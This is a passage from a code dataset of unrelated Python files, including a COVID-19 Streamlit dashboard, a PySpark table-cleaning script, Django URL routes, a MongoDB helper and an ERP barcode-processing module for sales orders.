\")\r\n\r\n\r\n","sub_path":"programmer/sammensatte_programmer/sannsynlighet/kombinatorikk.py","file_name":"kombinatorikk.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"316039939","text":"import os\nimport json\nimport random\n\nfrom billy import db\nfrom billy.commands import BaseCommand\nfrom billy.conf import settings\n\nfrom billy.commands.dump import APIValidator, api_url\n\nimport scrapelib\nimport validictory\n\n\nclass ValidateApi(BaseCommand):\n name = 'validateapi'\n help = 'validate data from the API'\n\n def add_args(self):\n self.add_argument('--apikey', dest='API_KEY',\n help='the API key to use')\n self.add_argument('--schema_dir', default=None,\n help='directory to use for API schemas (optional)')\n\n def handle(self, args):\n for meta in db.metadata.find():\n validate_api(meta['abbreviation'], args.schema_dir)\n\n\ndef get_json_schema(name, schema_dir):\n if schema_dir:\n try:\n schema_dir = os.path.abspath(schema_dir)\n with open(os.path.join(schema_dir, name + \".json\")) as f:\n return json.load(f)\n except IOError as ex:\n if ex.errno != 2:\n raise\n\n # Fallback to default schema dir\n cwd = os.path.split(__file__)[0]\n default_schema_dir = os.path.join(cwd, \"../schemas/api/\")\n\n with open(os.path.join(default_schema_dir, name + \".json\")) as f:\n return json.load(f)\n\n\ndef validate_api(abbr, schema_dir=None):\n metadata_schema = get_json_schema(\"metadata\", schema_dir)\n path = \"metadata/%s\" % abbr\n url = api_url(path)\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), metadata_schema,\n validator_cls=APIValidator)\n\n bill_schema = get_json_schema(\"bill\", schema_dir)\n\n spec = {settings.LEVEL_FIELD: abbr}\n total_bills = db.bills.find(spec).count()\n\n for i in xrange(0, 100):\n bill = db.bills.find(spec)[random.randint(0, total_bills - 1)]\n path = \"bills/%s/%s/%s/%s\" % (abbr, bill['session'],\n bill['chamber'], bill['bill_id'])\n url = api_url(path)\n\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), bill_schema,\n validator_cls=APIValidator)\n\n legislator_schema = get_json_schema(\"legislator\", schema_dir)\n for legislator in db.legislators.find(spec):\n path = 'legislators/%s' % legislator['_id']\n url = api_url(path)\n\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), legislator_schema,\n validator_cls=APIValidator)\n\n committee_schema = get_json_schema(\"committee\", schema_dir)\n for committee in db.committees.find(spec):\n path = \"committees/%s\" % committee['_id']\n url = api_url(path)\n\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), committee_schema,\n validator_cls=APIValidator)\n\n event_schema = get_json_schema(\"event\", schema_dir)\n total_events = db.events.find(spec).count()\n\n if total_events:\n for i in xrange(0, 10):\n event = db.events.find(spec)[random.randint(0, total_events - 1)]\n path = \"events/%s\" % event['_id']\n url = api_url(path)\n\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), event_schema,\n validator_cls=APIValidator)\n","sub_path":"billy/commands/validate_api.py","file_name":"validate_api.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"266322038","text":"import pandas as pd\n# import altair as alt\nimport streamlit as st\nfrom PIL import Image\n# import numpy as np\n# import matplotlib.pyplot as plt\nimport datetime\n# import seaborn as sns\n\nimage = Image.open('covid19.png')\nst.image(image, use_column_width=True)\n\n# @st.cache(allow_output_mutation=True)\ndef data_loader():\n url = 'https://toyokeizai.net/sp/visual/tko/covid19/csv/prefectures.csv'\n df = pd.read_csv(url)\n return df\n\nst.title('Japanese Covid-19 Dashboard')\n\n#データの整形\ndef to_date(d):\n # '{.formatの添え字:指定したい書式の型}' 02は最小幅は二桁という意味\n return pd.to_datetime('{0:02}/{1:02}/{2:02}'.format(d['year'], d['month'], d['date']), format='%Y/%m/%d')\n\ndef data_visualize():\n try:\n df = data_loader()\n # 日付に直す\n df['days'] = df.apply(to_date, axis=1)\n # Null値の補完\n df = df.fillna(0)\n\n # 型変換\n df['deaths'] = df['deaths'].astype(int)\n df['serious'] = df['serious'].astype(int)\n df['peopleTested'] = df['peopleTested'].astype(int)\n df['hospitalized'] = df['hospitalized'].astype(int)\n df['discharged'] = df['discharged'].astype(int)\n\n #カラム名の変更\n df = df.rename(columns={'days':'年月日', 'prefectureNameJ': '都道府県', 'peopleTested': '検査数','testedPositive':'陽性者数','discharged':'回復者数',\\\n 'hospitalized':'療養者数','serious':'重症者数','deaths':'死者数'})\n # 必要なカラムのみに絞る\n df = df[['年月日', '都道府県', '検査数', '陽性者数', '回復者数', '療養者数', '重症者数', '死者数']]\n\n _df = df.groupby('都道府県').max().sort_values('陽性者数',ascending=False)\n\n st.header('都道府県別の累計')\n st.dataframe(_df)\n st.bar_chart(_df['陽性者数'])\n\n st.header('全国陽性者数グラフ/日')\n df_days_all = df.loc[:, [\"年月日\", \"都道府県\", '陽性者数']]\n df_days_all = df_days_all.loc[:, [\"年月日\", \"都道府県\", '陽性者数']]\n df_days_all = df_days_all.set_index(\"年月日\")\n df_days_all = df_days_all.groupby('年月日').sum()\n df_days_all['陽性者数/日'] = df_days_all[\"陽性者数\"].diff()\n st.bar_chart(df_days_all['陽性者数/日'])\n\n #都道府県インプット\n _prefectureNameJ = st.sidebar.text_input(\"都道府県を入力してください\", \"東京都\")\n\n st.header(f'{_prefectureNameJ}・陽性者数グラフ/日')\n df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '陽性者数']]\n #年月日の差分\n df_days['陽性者数/日'] = df_days[\"陽性者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"陽性者数/日\"])\n # st.line_chart(df_days[\"陽性者数/日\"])\n\n df['陽性率'] = df['陽性者数'] / df['検査数'] * 100\n df['復帰率'] = df['回復者数'] / df['陽性者数'] * 100\n df['療養率'] = df['療養者数'] / df['陽性者数'] * 100\n df['重症化率'] = df['重症者数'] / df['陽性者数'] * 100\n df['死亡率'] = df['死者数'] / df['陽性者数'] * 100\n\n # days = '2021-08-19'\n days = datetime.datetime.now() - datetime.timedelta(days=2)\n days = datetime.datetime.strftime(days, '%Y-%m-%d')\n\n df2 = df[['都道府県', '検査数', '陽性者数', '回復者数', '療養者数', '重症者数','死者数', '陽性率', '復帰率', '療養率', '重症化率', '死亡率']][df['年月日'] == days]\n\n df3 = pd.DataFrame(\n data=df2[['検査数', '陽性者数', '回復者数', '療養者数', '重症者数', '死者数']].sum())\n df3 = df3.T\n df3['陽性率'] = df3['陽性者数'] / df3['検査数'] * 100\n df3['復帰率'] = df3['回復者数'] / df3['陽性者数'] * 100\n df3['療養率'] = df3['療養者数'] / df3['陽性者数'] * 100\n df3['重症化率'] = df3['重症者数'] / df3['陽性者数'] * 100\n df3['死亡率'] = df3['死者数'] / df3['陽性者数'] * 100\n\n st.header('全国累計')\n df3 = df3.reset_index(drop=True)\n st.dataframe(df3)\n\n st.header('都道府県別・PCR検査陽性率(降順)')\n _df2 = df2[['都道府県','検査数','陽性者数','陽性率']].sort_values('陽性率',ascending=False)\n # _df2 = df2.set_index('都道府県')\n\n _df2 = _df2.set_index(\"都道府県\")\n\n st.dataframe(_df2,1000)\n st.bar_chart(_df2['陽性率'], use_container_width=True)\n\n st.header('都道府県別・感染から復帰率(降順)')\n __df2 = df2[['都道府県', '陽性者数', '回復者数', '復帰率']].sort_values('復帰率', ascending=False)\n __df2 = __df2.set_index(\"都道府県\")\n st.dataframe(__df2)\n\n st.header(f'{_prefectureNameJ}・回復者数/日')\n # df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '回復者数']]\n #年月日の差分\n df_days['回復者数/日'] = df_days[\"回復者数\"] + df_days[\"回復者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"回復者数/日\"], use_container_width=True)\n\n\n st.header('都道府県別・療養率(降順)')\n __df2 = df2[['都道府県', '陽性者数', '療養者数', '療養率']].sort_values('療養率', ascending=False)\n __df2 = __df2.set_index(\"都道府県\")\n st.dataframe(__df2, width=1000)\n st.bar_chart(__df2['療養率'])\n\n st.header(f'{_prefectureNameJ}・療養者数/日')\n # df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '療養者数']]\n #年月日の差分\n df_days['療養者数/日'] = df_days[\"療養者数\"] + df_days[\"療養者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"療養者数/日\"], use_container_width=True)\n\n\n st.header('都道府県別・重症化率(降順)')\n __df2 = df2[['都道府県', '陽性者数', '重症者数', '重症化率']].sort_values('重症化率', ascending=False)\n __df2 = __df2.set_index(\"都道府県\")\n st.dataframe(__df2, width=1000)\n st.bar_chart(__df2['重症化率'], use_container_width=True)\n\n st.header(f'{_prefectureNameJ}・重症者数/日')\n # df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '重症者数']]\n #年月日の差分\n df_days['重症者数/日'] = df_days[\"重症者数\"] + df_days[\"重症者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"重症者数/日\"], use_container_width=True)\n\n\n st.header('都道府県別・死亡率(降順)')\n __df2 = df2[['都道府県', '陽性者数', '死者数', '死亡率']].sort_values('死亡率', ascending=False)\n __df2 = __df2.set_index(\"都道府県\")\n st.dataframe(__df2)\n st.bar_chart(__df2['死亡率'], use_container_width=True)\n\n st.header(f'{_prefectureNameJ}・死者数/日')\n # df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n df_days = df_prefecture.loc[:, [\"年月日\", \"都道府県\", '死者数']]\n #年月日の差分\n df_days['死者数/日'] = df_days[\"死者数\"].diff()\n df_days = df_days.set_index(\"年月日\")\n # st.write(df_days)\n st.bar_chart(df_days[\"死者数/日\"], use_container_width=True)\n except:\n st.error(\n \"エラーがおきているようです。都道府県名を漢字で入力してください。\"\n )\n\ndata_visualize()\n\nst.write('Copyright © 2021 Tomoyuki Yoshikawa. All Rights Reserved.')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"266421706","text":"from scipy.special import expit\nimport numpy as np\n\n\ndef sigmoid(z):\n \"\"\"\n Нет никакх причин добавлять эту функцию, можно просто использовать expit()\n\n :param z: любая матрица\n :return: матрица из элементов, знаения которых находятся в пределах 0..1\n \"\"\"\n return expit(z)\n\n\ndef predict(theta1, theta2, x):\n \"\"\"\n\n :param theta1: весовая матрица первого слоя нейросети\n :param theta2: весовая матрица второго слоя нейросети\n :param x: матрица входных параметров нейросети\n в данном случае каждой строке матрицы соответствует одно изображение\n строка состоит из 400 ячеек, которые представляют собой яркость пикселей изображения 20х20\n разложенные в одну строку\n :return:\n \"\"\"\n\n # m - получаем количество строк матрицы входных значения (количество изображений)\n m = x.shape[0]\n\n # ones - единичная матрица m - строк и 1 столбей\n ones = np.ones((m, 1))\n\n # a1 - конкатенация единичной матрицы слева от матрицы входных параметров\n a1 = np.c_[ones, x]\n\n # умножение матрицы входных параметров на матрицу весовых коэффициентов\n z2 = np.dot(a1, theta1.T)\n\n # функция sigmoid дает на выходе матрицу с элементами уложенными в пределы 0..1\n # результат функции sigmoid это выходные значения первого слоя нейросети и входные значения второго слоя\n # a2 - конкатенация 1й матрицы с матрицей входных параметров для 2го слоя матрицы\n a2 = np.c_[ones, sigmoid(z2)]\n \n # выход 2го уровня матрицы, до обработки сигмойдой\n z3 = np.dot(a2, theta2.T)\n \n # выход второго слоя после обработки сигмойдой\n h_x = sigmoid(z3)\n \n # возвращает индекс наибольшей величины для каждой строки матрицы\n # элемент, значение которого самое большое и есть предполжение нейросети\n p = np.argmax(h_x, axis=1)\n return p\n","sub_path":"functions/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45260529","text":"\"\"\"DB management functions\"\"\"\n\nimport os\nfrom pymongo import MongoClient\nimport pymongo\n\ntry:\n DB_URI_FILE = os.environ['DB_URI_FILE']\nexcept KeyError:\n raise RuntimeError(\n 'Pantrymatic failed to start: Must set file containing a MongoDB URI in environment '\n 'variable \"DB_URI_FILE\". URI format is mongodb://username:password@hostname:port/db_name'\n )\nwith open(os.path.expanduser(DB_URI_FILE), 'r') as URI_FILE:\n DB_URI = URI_FILE.read().strip()\n DB_NAME = os.path.basename(DB_URI)\n if not os.path.basename:\n raise ValueError(f'Cannot parse DB_URI: {DB_URI}')\n\ndef get_db():\n \"\"\"Returns a pymong db client object.\"\"\"\n client = MongoClient(DB_URI)\n db = client[DB_NAME]\n _create_indexes(db)\n return db\n\ndef _create_indexes(db):\n \"\"\"Creates all default indexes on the databse.\"\"\"\n db.users.create_index(\"email\", unique=True)\n db.foods.create_index([(\"user\", pymongo.ASCENDING),\n (\"name\", pymongo.ASCENDING),\n (\"pack_size\", pymongo.ASCENDING)], unique=True)\n","sub_path":"pantrymatic/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"130285724","text":"#dynamically take the table name from text file and clean the data for all tables\nfrom pyspark.sql.functions import col, count, isnan, lit, sum\nimport sys\nimport os\nimport subprocess\n#function to run hdfs command and check whether directory alrady exist in hdfs or not\ndef run_cmd(args_list):\n print('Running system command: {0}'.format(' '.join(args_list)))\n proc = subprocess.Popen(args_list, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n proc.communicate()\n return proc.returncode\n#function to run any hdfs commands in pyspark\ndef run_cmd1(args_list):\n print('Running system command: {0}'.format(' '.join(args_list)))\n proc = subprocess.Popen(args_list, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n (output, errors) = proc.communicate()\n if proc.returncode:\n raise RuntimeError(\n 'Error running command: %s. Return code: %d, Error: %s' % (\n ' '.join(args_list), proc.returncode, errors))\n return (output, errors)\n#function to count total number null for each column\ndef count_not_null(c, nan_as_null=False):\n \"\"\"Use conversion between boolean and integer\n - False -> 0\n - True -> 1\n \"\"\"\n pred = col(c).isNull() & (~isnan(c) if nan_as_null else lit(True))\n return sum(pred.cast(\"integer\")).alias(c)\nwith open('tablename.txt') as f:\n for i in f:\n i = i.rstrip('\\n')\n spark.sql(\"Use miti_db\")\n tables_df1 = spark.sql(\"show tables like \\'{}\\'\".format(i)).count()\n if(tables_df1 == 0):\n print(\"There is no table named {} in hive database\".format(i))\n else:\n i = i.rstrip('\\n')\n print(\"table name: \"+ i);\n storeprint = 0\n tables_df = spark.sql(\"select * from miti_db.{}\".format(i))\n print('count of {0} {1}'.format(i,tables_df.count()))\n dropduplicate_tables_df =tables_df.dropDuplicates()\n print('count of dinstinct {0} {1}'.format(i,dropduplicate_tables_df.count()))\n dropnull=tables_df.dropna()\n print('count after droping null {0} {1}'.format(i,dropnull.count()))\n dfschemafordistinct=tables_df.select([ col_name for col_name in tables_df.columns if tables_df.count()== dropduplicate_tables_df.count() ])\n dfschemafordistinctstr=str(dfschemafordistinct)\n columns = [ column for column in tables_df.columns if len(tables_df.select(column).distinct().collect()) == len(tables_df.select(column).collect()) ]\n # df.select(columns).show()\n printschema = tables_df.select(columns)\n printschemastr = str(printschema)\n # print(printschemastr)\n # print(dfschemafordistinctstr)\n #print(dfschemafordistinctstr)\n #dfschemafordistinct.show(1)\n #print(suppliers.select([ col_name for col_name in suppliers.columns if suppliers.count()== dropduplicatsupplier.count() ]))\n import re\n strprimarykey=re.findall(r'\\[(\\w+)',printschemastr)\n if not strprimarykey:\n print ('There is no primary key in this table')\n dropduplicate_tables_df = tables_df.dropDuplicates()\n dropnul_thresh3 = dropduplicate_tables_df.dropna(thresh=3)\n dropnul_thresh3.show(3)\n print('final count in table which has no primary key {0}'.format(dropnul_thresh3.count()))\n path = str(\"/user/miti/project_shellscript/alltables_cleansed/\")+i\n # print(path)\n\n cmd = ['hadoop', 'fs', '-test', '-e',path]\n code = run_cmd(cmd)\n # print(code)\n if code == 1:\n\n dropnul_thresh3.coalesce(1).write.format('com.databricks.spark.csv').options(header='true').save(path)\n print(\"File has been saved\")\n else:\n print(\"CSV File is already written\")\n\n else:\n # print(strprimarykey[0])\n print('Count of distinct_tables_df from subset, excluding primarykey column: {0}'.format(\n tables_df.select([\n col_name for col_name in tables_df.columns if col_name != strprimarykey[0]\n ]).distinct().count()))\n tables_df_dropduplicate_expk = tables_df.dropDuplicates(subset=[\n col_name for col_name in tables_df.columns if col_name != strprimarykey[0]])\n drop_null_thres3 = tables_df_dropduplicate_expk.dropna(thresh=3)\n # drop_null_thres3.show(3)\n print('final count after dropping row with three null values {0}'.format(drop_null_thres3.count()))\n path = str(\"/user/miti/project_shellscript/alltables_cleansed/\")+i\n # print(path)\n\n cmd = ['hadoop', 'fs', '-test', '-e',path]\n code = run_cmd(cmd)\n # print(code)\n if code == 1:\n drop_null_thres3.coalesce(1).write.format('com.databricks.spark.csv').options(header='true').save(path)\n else:\n print(\"CSV File is already written\")\n print(\"total null counts in Columns\")\n tables_df.agg(*[count_not_null(c) for c in tables_df.columns]).show()\n\n\nquit()\n\n","sub_path":"dynamic_script.py","file_name":"dynamic_script.py","file_ext":"py","file_size_in_byte":6719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"120345587","text":"from django.urls import path\n\nfrom books import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('book/', views.BookListView.as_view(), name='book_list'),\n path('book//', views.BookDetailView.as_view(), name='book-detail'),\n path('book/genres//', views.BookListView.as_view(), name='book_genre'),\n path('topten', views.topten, name='topten'),\n path('book/create/', views.BookCreateView.as_view(), name='book-create'),\n path('book//update/', views.BookUpdateView.as_view(), name='book-update'),\n path('book//delete/', views.BookDeleteView.as_view(), name='book-delete'),\n\n path('author/', views.AuthorListView.as_view(), name='author_list'),\n path('author//', views.AuthorDetailView.as_view(), name='author-detail'),\n path('author/create/', views.AuthorCreateView.as_view(), name='author-create'),\n path('author//update/', views.AuthorUpdateView.as_view(), name='author-update'),\n path('author//delete/', views.AuthorDeleteView.as_view(), name='author-delete')\n]\n","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"39722945","text":"import os\r\n\r\nimport torch\r\nimport torch.utils\r\n\r\nimport numpy as np\r\nimport pandas\r\n\r\nfrom .folder_dataset import FolderDataset\r\nfrom torch.utils.data import DataLoader\r\n\r\n\r\ndef load_folder_data(root, train_val_rate, batch_size, test=False, train_width=None, test_width=None):\r\n # Load data\r\n print('1. Loading train data')\r\n train_path = os.path.join(root, 'train')\r\n train_labels_file = os.path.join(root, 'train_labels.csv')\r\n\r\n # Create datasets\r\n print('2. Creating datasets')\r\n dataset = FolderDataset(path=train_path, labels_csv=train_labels_file, do_transform=False, crop_time=True, width=test_width)\r\n train_length, validation_length = int(train_val_rate*len(dataset)), len(dataset) - int(train_val_rate*len(dataset))\r\n trainset, validationset = torch.utils.data.random_split(dataset, [train_length, validation_length])\r\n validationset.width = test_width\r\n\r\n # Create dataloaders\r\n print('3. Creating dataloaders')\r\n trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=4)\r\n validationloader = DataLoader(validationset, batch_size=batch_size, shuffle=True, num_workers=4)\r\n\r\n if test:\r\n # Get test data from images\r\n print('4. Loading test data')\r\n test_path = os.path.join(root, 'test')\r\n\r\n # Create datasets\r\n print('5. Creating test datasets')\r\n testset = FolderDataset(path=test_path, labels_csv=None, do_transform=False, crop_time=True, width=test_width)\r\n\r\n # Create dataloader\r\n print('6. Creating test dataloader')\r\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=4)\r\n\r\n # Load submission dataframe\r\n # submission_df = pandas.read_csv(os.path.join(root, 'submission_format.csv'))\r\n else:\r\n testloader = None\r\n # submission_df = None\r\n\r\n return trainloader, validationloader, testloader\r\n\r\n\r\ndef save_outputs(test_outputs, root, suffix):\r\n submission_df = pandas.read_csv(os.path.join(root, 'submission_format.csv'))\r\n submission_df['accent'] = test_outputs.astype(np.int64)\r\n submission_df.to_csv(os.path.join(root, suffix), index=False)\r\n","sub_path":"Classification/Accents/data_utils/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"73601215","text":"\n# @class_declaration sanhigia_pedidos #\nfrom models.flfacturac.lineaspedidoscli import lineaspedidoscli\nfrom models.flfactppal.sh_trabajadores import sh_trabajadores\nfrom models.flfactalma.articulosprov import articulosprov\nfrom models.flfactalma import flfactalma_def\n\n\nclass sanhigia_pedidos(flfacturac):\n\n def sanhigia_pedidos_procesaCodBarras(self, model, oParam):\n # print(\"proceso\")\n # print(oParam)\n # Suma 1\n cantidad = 1\n qsatype.debug(oParam)\n # if str(oParam['codbarras']).endsith(\"\\x00\"):\n # qsatype.debug(\"tiene esos caracteres extraños\")\n qsatype.debug(ustr(\"lencodbarras \", len(oParam['codbarras'])))\n qsatype.debug(ustr(\"codigobarrasprevio \", oParam['codbarras']))\n # oParam['codbarras'] = re.sub(r\"/(\\\\x00)/g\", \" \", oParam['codbarras'])\n # oParam['codbarras'] = re.sub(r\"/(\\^@)/g\", \" \", oParam['codbarras'])\n # if len(oParam['codbarras']) > 35:\n # oParam['codbarras'] = oParam['codbarras'][:-32]\n # qsatype.debug(ustr(\"codigobarrasposterior \", oParam['codbarras']))\n\n if \"referencia\" in oParam:\n oParam['idpedido'] = model.pk\n oParam['idlinea'] = self.iface.dameIdLinea(oParam)\n if not oParam['idlinea']:\n return False\n # Ya no va a venir idlinea en oparam lo voy a meter yo, buscando lineas de model.pk que tengan esa referencia\n # Si tengo idlinea y codlote puedo asignar procesar el codigo de barras\n if \"idlinea\" in oParam and \"codlote\" in oParam:\n val = self.iface.insertarMovilote(oParam['idlinea'], oParam['referencia'], cantidad, model.codalmacen.codalmacen, oParam['codlote'])\n if val['status'] == 0:\n return True\n return val\n # Si idlinea y codproveedor en oParam tengo todo lo necesario para asignar un codigo de barras\n if \"idlinea\" in oParam and \"codproveedor\" in oParam:\n # print(\"viene por aqui 1\")\n referencia = qsatype.FLUtil.sqlSelect(\"lineaspedidoscli\", \"referencia\", \"idlinea = {}\".format(oParam['idlinea']))\n # linea = lineaspedidoscli.objects.get(pk=oParam['idlinea'])\n objcod = flfactalma_def.iface.datosLecturaCodBarras(oParam['codbarras'], oParam[\"codproveedor\"], referencia)\n porLotes = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"porlotes\", \"referencia = '{}'\".format(referencia))\n if not porLotes and \"lote\" in objcod:\n objcod['lote'] = None\n asociado = flfactalma_def.iface.asociarCodBarras(referencia, oParam[\"codproveedor\"], objcod['codbarras'])\n if asociado and not objcod['lote']:\n val = self.iface.analizaCodBarras(model.pk, oParam['codbarras'], cantidad, model.codalmacen.codalmacen, oParam['idlinea'])\n qsatype.debug(ustr(\"analizado \", val))\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n return val\n else:\n val = self.iface.analizaCodBarrasLote(referencia, objcod['codbarras'], objcod['lote'], cantidad, oParam['idlinea'], model.codalmacen.codalmacen)\n qsatype.debug(ustr(\"analizado \", val))\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n return val\n\n # Si idlinea en oParam significa que me estan enviando un codigo de barras para asociar a un articulo de la linea\n if \"idlinea\" in oParam and \"codproveedor\" not in oParam:\n # print(\"viene por aqui 2\")\n # linea = lineaspedidoscli.objects.get(pk=oParam['idlinea'])\n referencia = qsatype.FLUtil.sqlSelect(\"lineaspedidoscli\", \"referencia\", \"idlinea = {}\".format(oParam['idlinea']))\n # proveedor = articulosprov.objects.filter(referencia__exact=linea.referencia)\n codproveedor = qsatype.FLUtil.sqlSelect(\"articulosprov\", \"codproveedor\", \"referencia = '{}'\".format(referencia))\n if codproveedor:\n # print(\"tengo idlinea y no proveedor pero \", proveedor[0].codproveedor, \" \", linea.referencia, \" \", oParam['codbarras'])\n objcod = flfactalma_def.iface.datosLecturaCodBarras(oParam['codbarras'], codproveedor, referencia)\n porLotes = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"porlotes\", \"referencia = '{}'\".format(referencia))\n if not porLotes and \"lote\" in objcod:\n objcod['lote'] = None\n asociado = flfactalma_def.iface.asociarCodBarras(referencia, codproveedor, objcod['codbarras'])\n if asociado and not objcod['lote']:\n val = self.iface.analizaCodBarras(model.pk, oParam['codbarras'], cantidad, model.codalmacen.codalmacen, oParam['idlinea'])\n qsatype.debug(ustr(\"analizado \", val))\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n return val\n else:\n val = self.iface.analizaCodBarrasLote(referencia, objcod['codbarras'], objcod['lote'], cantidad, oParam['idlinea'], model.codalmacen.codalmacen)\n qsatype.debug(ustr(\"analizado \", val))\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n return val\n else:\n response = {}\n response['status'] = -1\n response['data'] = {\"codbarras\": oParam['codbarras'], \"cantidad\": cantidad, \"idlinea\": oParam[\"idlinea\"], \"referencia\": referencia}\n response['params'] = [\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"desc_name\": \"Proveedor\",\n \"verbose_name\": \"Proveedor\",\n \"tipo\": 5,\n \"rel\": \"articulosprov\",\n \"aplic\": \"almacen\",\n \"filtro\": {\"referencia\": None},\n \"key\": \"codproveedor\",\n \"desc\": \"nombre\",\n \"showpk\": False\n },\n {\n \"tipo\": 37,\n \"required\": True,\n \"verbose_name\": \"codbarras\",\n \"visible\": False,\n \"key\": \"codbarras\",\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"cantidad\",\n \"key\": \"cantidad\",\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"idlinea\",\n \"key\": \"idlinea\",\n \"visible\": False,\n \"validaciones\": None\n }\n ]\n return response\n return False\n\n # Solo viene codigo de barras y cantidad\n else:\n val = self.iface.analizaCodBarras(model.pk, oParam['codbarras'], cantidad, model.codalmacen.codalmacen, None)\n qsatype.debug(ustr(\"analizado \", val))\n # print(val)\n return self.iface.respuestaAnalizaCodBarras(model, oParam, val)\n\n return True\n\n def sanhigia_pedidos_dameIdLinea(self, oParam):\n if \"idpedido\" in oParam:\n where = u\"referencia = '{}' AND idpedido = '{}'\".format(oParam['referencia'], oParam['idpedido'])\n elif \"preparacion\" in oParam:\n # where = ustr(u\"referencia = '\", oParam['referencia'], \"' AND codpreparaciondepedido = '\", oParam['preparacion'], \"' AND sh_preparacion = 'En Curso'\")\n where = u\"referencia = '{}' AND codpreparaciondepedido = '{}' AND sh_preparacion = 'En Curso'\".format(oParam['referencia'], oParam['preparacion'])\n else:\n return False\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lineaspedidoscli\")\n query.setSelect(u\"idlinea, referencia, cantidad, shcantalbaran, totalenalbaran\")\n query.setFrom(u\"lineaspedidoscli\")\n query.setWhere(where)\n idLinea = -1\n if query.exec_():\n if query.size() > 1:\n while query.next():\n total = int(query.value('totalenalbaran') or 0)\n if int(query.value('cantidad')) != int(query.value('shcantalbaran') or 0) + int(total):\n idLinea = query.value(0)\n if query.size() == 1:\n if query.next():\n idLinea = query.value(0)\n # if not idLinea:\n # idLinea = query.value(0)\n return idLinea\n\n def sanhigia_pedidos_respuestaAnalizaCodBarras(self, model, oParam, val):\n # Si se produce un error que no permite modificar el pedido\n # Suma 1\n cantidad = 1\n if val['status'] == -3:\n return val\n\n # -1 Si el codigo de barras no pertenece a nigun articulo y algun articulo del pedido no tienen codigo de barras\n if val['status'] == -1:\n opts = []\n # print(\"________________\")\n # print(val)\n query = val['param']\n while query.next():\n opt = {}\n opt['key'] = query.value(0)\n opt['alias'] = query.value(0) + \" - \" + query.value(1)\n opts.append(opt)\n response = {}\n response['status'] = -1\n response['data'] = {\"codbarras\": oParam['codbarras'], \"cantidad\": cantidad}\n response['params'] = [\n {\n \"componente\": \"YBFieldDB\",\n \"tipo\": 90,\n \"verbose_name\": \"Opts\",\n \"label\": \"Asignar el Código de Barras a un articulo\",\n \"style\": {\"width\": \"700px\"},\n \"key\": \"referencia\",\n \"validaciones\": None,\n \"opts\": opts\n },\n {\n \"tipo\": 37,\n \"required\": True,\n \"verbose_name\": \"codbarras\",\n \"visible\": False,\n \"key\": \"codbarras\",\n \"validaciones\": None\n },\n {\n \"tipo\": 3,\n \"required\": False,\n \"verbose_name\": \"cantidad\",\n \"key\": \"cantidad\",\n \"visible\": False,\n \"validaciones\": None\n }\n ]\n return response\n\n # va por lotes y no tengo codlote\n if val['status'] == 2:\n opts = []\n query = val['param']['query']\n while query.next():\n opt = {}\n opt['key'] = query.value(\"codlote\")\n formatofecha = \"%d/%m/%Y\"\n fecha = query.value(\"caducidad\").strftime(formatofecha)\n descLote = query.value(\"descripcion\") or \"\"\n opt['alias'] = query.value(\"codigo\") + \" - \" + str(int(query.value(\"enalmacen\"))) + \" - \" + str(fecha) + \" - \" + descLote\n opts.append(opt)\n response = {}\n response['status'] = 